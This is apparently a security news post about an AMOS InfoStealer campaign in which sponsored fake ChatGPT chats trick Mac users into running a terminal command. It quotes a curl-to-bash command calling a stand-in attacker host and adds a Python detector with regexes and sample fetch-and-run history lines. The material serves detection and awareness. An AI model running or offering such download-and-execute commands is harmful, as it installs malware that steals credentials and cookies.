Cyber Web Spider Blog – News

Threat Actors Leverage ChatGPT to Attack Mac Devices With AMOS InfoStealer

Posted on December 11, 2025 By CWS

A new AMOS InfoStealer campaign is abusing trust in ChatGPT to infect Mac devices under the guise of simple troubleshooting help.

Victims search for a fix to a sound problem, click a sponsored ChatGPT result, and are shown what looks like a normal chat session.

The chat then returns a “restore” command and tells the user to run it in the macOS terminal.

Google Chrome Browsing History extract from infected Mac device (Source – KROLL)

The attack blends social engineering and technical abuse in a way that feels routine to users. There is no fake installer window or obvious phishing page.

Instead, the victim follows what appears to be a normal help flow in a well-known AI chat interface. KROLL security researchers identified that this flow was used to deploy AMOS InfoStealer on targeted Mac endpoints.

The KROLL team detected that the lure is pushed using Google Ads, which place the malicious ChatGPT session at the top of search results. The domain shown is legitimate, which makes it even harder for a normal user to spot the risk.

Once the user trusts the chat, a single copy‑paste operation in the terminal is enough to compromise the system.

ChatGPT Instructions shown to the user (Source – KROLL)

The impact is serious for both home users and companies. AMOS InfoStealer is built to harvest browser data, credentials, session cookies, and other stored secrets from the infected Mac.

Stolen data can then be reused for account takeover, lateral movement, or sale on underground markets.

Infection Mechanism and Malicious Command Execution

KROLL analysts traced the initial infection to a terminal command given by the fake ChatGPT chat, which acts as an indicator of compromise.

The command tells macOS to download and run a remote script, a pattern that aligns with MITRE ATT&CK techniques for user execution and ingress tool transfer.

A typical malicious pattern looks like:

curl -s https://attacker-example[.]com/installer.sh | bash

When executed, this one‑line command pulls a shell script over HTTPS, saves nothing visible to the user, and runs the script in the same terminal session. The script can then install AMOS, set up persistence, and start data theft.
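
Because the command itself is the indicator, it can be hunted for in shell history files or process command-line telemetry. The following is an added example, not code from KROLL or the original article: the function name, the sample lines and the `example.test` hosts are constructed, and it generalizes the quoted one-liner to `wget`, other shells and the command-substitution form.

```python
import re

FETCH = r"(?:curl|wget)"
SHELLS = r"(?:ba|z|da|k)?sh"   # sh, bash, zsh, dash, ksh

# Form 1: fetcher ... | [sudo] [/path/]shell   (the pattern quoted in the article)
PIPE_RE = re.compile(
    rf"\b(?P<tool>{FETCH})\b[^|]*\|\s*(?:sudo\s+)?(?:\S*/)?(?P<shell>{SHELLS})\b")
# Form 2: shell -c "$(fetcher ...)", shell <(fetcher ...) or backticks
SUBST_RE = re.compile(
    rf"(?<![\w.-])(?P<shell>{SHELLS})\b[^|]*?(?:\$\(|<\(|`)\s*(?P<tool>{FETCH})\b")
URL_RE = re.compile(r"https?://[^\s'\"|)`]+")
ZSH_PREFIX_RE = re.compile(r"^: \d+:\d+;")   # zsh EXTENDED_HISTORY timestamp

# Constructed sample input; only the first line comes from the article.
SAMPLE_HISTORY = [
    "curl -s https://attacker-example[.]com/installer.sh | bash",
    ": 1765400000:0;curl -fsSL 'https://cdn.example.test/fix?id=1&v=2' | sudo /bin/zsh",
    'bash -c "$(curl -fsSL https://cdn.example.test/setup.sh)"',
    "curl -s https://api.example.test/status | jq .",            # piped to a parser
    "curl -o report.pdf https://files.example.test/report.pdf",  # saved, not run
    "./installer.sh --check",                                    # local script
]


def find_download_and_execute(lines):
    """Return one finding per line that fetches a remote script and runs it."""
    findings = []
    for lineno, raw in enumerate(lines, start=1):
        cmd = ZSH_PREFIX_RE.sub("", raw.strip())
        m = PIPE_RE.search(cmd) or SUBST_RE.search(cmd)
        if not m:
            continue
        url = URL_RE.search(cmd)
        findings.append({
            "line": lineno,
            "form": "pipe" if m.re is PIPE_RE else "substitution",
            "tool": m.group("tool"),
            "shell": m.group("shell"),
            "url": url.group(0) if url else None,
        })
    return findings


if __name__ == "__main__":
    for finding in find_download_and_execute(SAMPLE_HISTORY):
        print(finding)
```

Downloads that are piped to a parser or saved to disk are deliberately not flagged, so a hit means the fetched content was handed straight to a shell.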
